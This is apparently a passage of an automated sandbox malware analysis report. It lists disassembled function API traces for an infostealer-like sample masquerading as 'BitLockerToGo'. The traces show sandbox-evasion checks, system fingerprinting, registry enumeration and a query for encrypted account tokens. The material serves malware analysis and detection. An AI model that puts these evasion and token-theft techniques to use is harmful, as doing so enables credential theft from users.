                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                                                                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                • API String ID: 1440504306-1079375795
                                                                                                                                                                • Opcode ID: 5cc5171718a3cc1796e4ee7f575b9f149a1332cac6ee7209ce488ec5f102edd3
                                                                                                                                                                • Instruction ID: b1783d4296291446ab10785157e8cfb1eb71881fd31a4d0beee1098f04d51a52
                                                                                                                                                                • Opcode Fuzzy Hash: 5cc5171718a3cc1796e4ee7f575b9f149a1332cac6ee7209ce488ec5f102edd3
                                                                                                                                                                • Instruction Fuzzy Hash: 77B16579A132089BDF08FBA0DD95EEE733DAF94210F404159F506AB090EF74AA59CB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03543038), ref: 030198A1
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03543050), ref: 030198BA
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03543068), ref: 030198D2
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03543080), ref: 030198EA
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03543098), ref: 03019903
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,035430B0), ref: 0301991B
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03544358), ref: 03019933
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03544378), ref: 0301994C
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03544398), ref: 03019964
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,035443B0), ref: 0301997C
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,035443C8), ref: 03019995
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,035404B0), ref: 030199AD
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,035404C8), ref: 030199C5
                                                                                                                                                                  • Part of subcall function 03019860: GetProcAddress.KERNEL32(75550000,03547338), ref: 030199DE
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 030011D0: CreateDCA.GDI32(03540598,00000000,00000000,00000000), ref: 030011E2
                                                                                                                                                                  • Part of subcall function 030011D0: GetDeviceCaps.GDI32(?,0000000A), ref: 030011F1
                                                                                                                                                                  • Part of subcall function 030011D0: ReleaseDC.USER32(00000000,?), ref: 03001200
                                                                                                                                                                  • Part of subcall function 030011D0: ExitProcess.KERNEL32 ref: 03001211
                                                                                                                                                                  • Part of subcall function 03001160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03016A17,03020AEF), ref: 0300116A
                                                                                                                                                                  • Part of subcall function 03001160: ExitProcess.KERNEL32 ref: 0300117E
                                                                                                                                                                  • Part of subcall function 03001110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,03016A1C), ref: 0300112B
                                                                                                                                                                  • Part of subcall function 03001110: VirtualAllocExNuma.KERNEL32(00000000,?,?,03016A1C), ref: 03001132
                                                                                                                                                                  • Part of subcall function 03001110: ExitProcess.KERNEL32 ref: 03001143
                                                                                                                                                                  • Part of subcall function 03001220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0300123E
                                                                                                                                                                  • Part of subcall function 03001220: __aulldiv.LIBCMT ref: 03001258
                                                                                                                                                                  • Part of subcall function 03001220: __aulldiv.LIBCMT ref: 03001266
                                                                                                                                                                  • Part of subcall function 03001220: ExitProcess.KERNEL32 ref: 03001294
                                                                                                                                                                  • Part of subcall function 03016770: GetUserDefaultLangID.KERNEL32(?,?,03016A26,03020AEF), ref: 03016774
                                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 03016A26
                                                                                                                                                                  • Part of subcall function 03001190: ExitProcess.KERNEL32 ref: 030011C6
                                                                                                                                                                  • Part of subcall function 03017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,030011B7), ref: 03017880
                                                                                                                                                                  • Part of subcall function 03017850: RtlAllocateHeap.NTDLL(00000000), ref: 03017887
                                                                                                                                                                  • Part of subcall function 03017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0301789F
                                                                                                                                                                  • Part of subcall function 030178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,03016A2B), ref: 03017910
                                                                                                                                                                  • Part of subcall function 030178E0: RtlAllocateHeap.NTDLL(00000000), ref: 03017917
                                                                                                                                                                  • Part of subcall function 030178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0301792F
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,03540578,?,0302110C,?,00000000,?,03021110,?,00000000,03020AEF), ref: 03016ACA
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03016AE8
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 03016AF9
                                                                                                                                                                • Sleep.KERNEL32(00001770), ref: 03016B04
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,?,03540578,?,0302110C,?,00000000,?,03021110,?,00000000,03020AEF), ref: 03016B1A
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 03016B22
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Process$Exit$Heap$Userlstrcpy$AllocateCloseCreateDefaultEventHandleName__aulldiv$AllocCapsComputerCurrentDeviceGlobalInfoLangMemoryNumaOpenReleaseSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1606067472-0
                                                                                                                                                                • Opcode ID: 6e7d67cf0844da383eb64f5836bd18c652214b3fc83e2130bdb6fe7dc9389618
                                                                                                                                                                • Instruction ID: 24cf14554e2dc68f88a174027bbea19407cf804055aaf3b3ad434639696a3e9b
                                                                                                                                                                • Opcode Fuzzy Hash: 6e7d67cf0844da383eb64f5836bd18c652214b3fc83e2130bdb6fe7dc9389618
                                                                                                                                                                • Instruction Fuzzy Hash: 16311E79A43308ABDB08F7F0ED55BEE7778AF84750F404518E512AA180DFB06555CAA1
                                                                                                                                                                APIs
                                                                                                                                                                • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 03018426
                                                                                                                                                                • wsprintfA.USER32 ref: 03018459
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0301847B
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0301848C
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 03018499
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,03555DA8,00000000,000F003F,?,00000400), ref: 030184EC
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 03018501
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,03555E68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,03020B34), ref: 03018599
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 03018608
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0301861A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                • String ID: %s\%s
                                                                                                                                                                • API String ID: 3896182533-4073750446
                                                                                                                                                                • Opcode ID: 3c1ddab1e1e2fc495b8b75f483d3fbbb7b950b77f480818bd8b03cdfb0cb63c0
                                                                                                                                                                • Instruction ID: 3171f417cebdf3cacdacc63076334654e4a812c6486e47a7bf01df1550f873e7
                                                                                                                                                                • Opcode Fuzzy Hash: 3c1ddab1e1e2fc495b8b75f483d3fbbb7b950b77f480818bd8b03cdfb0cb63c0
                                                                                                                                                                • Instruction Fuzzy Hash: DB210775A5122CABDB64DB54DC84FE9B3B8FB48704F00C5D8A609A6140DF716A85CFD4
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$CrackInternetlstrlen
                                                                                                                                                                • String ID: <
                                                                                                                                                                • API String ID: 1683549937-4251816714
                                                                                                                                                                • Opcode ID: 991ac4fe407fc565cf514fbb09cfa8b73e4316d71c501f7f69334fda43eb142c
                                                                                                                                                                • Instruction ID: ddc0d8e7b692cc2fb342f6b433e073c622d7563e3de53fba02bf03a407a37dee
                                                                                                                                                                • Opcode Fuzzy Hash: 991ac4fe407fc565cf514fbb09cfa8b73e4316d71c501f7f69334fda43eb142c
                                                                                                                                                                • Instruction Fuzzy Hash: 3F2129B5D01209ABDF14EFA4E949BDD7B74FF44320F108225F925AB280EB706A15CF91
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 030176A4
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 030176AB
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,035511F8,00000000,00020119,00000000), ref: 030176DD
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,03555D30,00000000,00000000,?,000000FF), ref: 030176FE
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 03017708
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                • String ID: Windows 11
                                                                                                                                                                • API String ID: 3225020163-2517555085
                                                                                                                                                                • Opcode ID: 2cfe81a1bbcb633de7b3cba97630941a00741b67bf408183887777fba70dc298
                                                                                                                                                                • Instruction ID: 8374164d645a88533f95a60ed2dc300c67e27e27cb3530c15864cf5c31c19afc
                                                                                                                                                                • Opcode Fuzzy Hash: 2cfe81a1bbcb633de7b3cba97630941a00741b67bf408183887777fba70dc298
                                                                                                                                                                • Instruction Fuzzy Hash: 6601FFB9A81308BBE710EBE4F94DFAEB7BCEB48B01F108454FA0597284E77499148B50
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 03017734
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0301773B
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,035511F8,00000000,00020119,030176B9), ref: 0301775B
                                                                                                                                                                • RegQueryValueExA.KERNEL32(030176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0301777A
                                                                                                                                                                • RegCloseKey.ADVAPI32(030176B9), ref: 03017784
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                • String ID: CurrentBuildNumber
                                                                                                                                                                • API String ID: 3225020163-1022791448
                                                                                                                                                                • Opcode ID: 658aae03dfb541944ec6bb47c328ce1dffcd115f36223d5b86f2d80427a4e5ac
                                                                                                                                                                • Instruction ID: d4fd76622e5d63bccb7c5e96d10d6359219f996125a92ccac99d5054f04d4292
                                                                                                                                                                • Opcode Fuzzy Hash: 658aae03dfb541944ec6bb47c328ce1dffcd115f36223d5b86f2d80427a4e5ac
                                                                                                                                                                • Instruction Fuzzy Hash: E90144B9A40308BBE710EBE0EC4DFAEB7BCEB48700F008154FA05A7285D77056008F51
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 030140D5
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,035558F0,00000000,00020119,?), ref: 030140F4
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,03556078,00000000,00000000,00000000,000000FF), ref: 03014118
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 03014122
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03014147
                                                                                                                                                                • lstrcat.KERNEL32(?,03556300), ref: 0301415B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$CloseOpenQueryValuememset
